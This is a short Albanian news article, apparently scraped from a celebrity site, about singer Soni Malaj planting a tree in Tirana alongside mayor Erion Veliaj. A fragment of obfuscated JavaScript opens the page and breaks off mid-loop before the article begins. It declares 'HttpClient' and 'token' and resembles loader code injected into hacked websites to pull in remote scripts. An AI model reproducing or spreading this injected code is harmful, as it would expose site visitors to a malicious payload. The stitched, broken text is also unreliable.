;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ditë e veçantë për Soni Malajn – këngëtarja mbjell pemën e saj në Tiranë

By

E shoqëruar nga kreu i Bashkisë së Tiranës, Erion Veliaj, këngëtarja e famshme Soni Malaj, e ka mbjellë pemën e saj në kryeqytetin shqiptar.

Këngëtarja e famshme me prejardhje nga Tropoja, ka thënë që e ka shumë për kënaqësi që i ka kontribuuar qytetit ku tash e 20 vjet jeton e vepron.

Videon nga kjo ceremoni simpatike, e ka ndarë me ndjekësit e tij në Instagram vet Veliaj, i cili i është falënderuar këngëtares.

“Soni Malaj, një figurë e shkëlqyer e muzikës sonë, mbolli një super pemë të bukur ‘Kamelia’ Jam shumë mirënjohës, e mezi pres që pas pemës të na bëjë edhe një dhuratë tjetër, ndoshta ndonjë super spektakël tek amfiteatri”, ka shkruar Veliaj në Instagram. /Prive.al

Artikuj të ngjashëm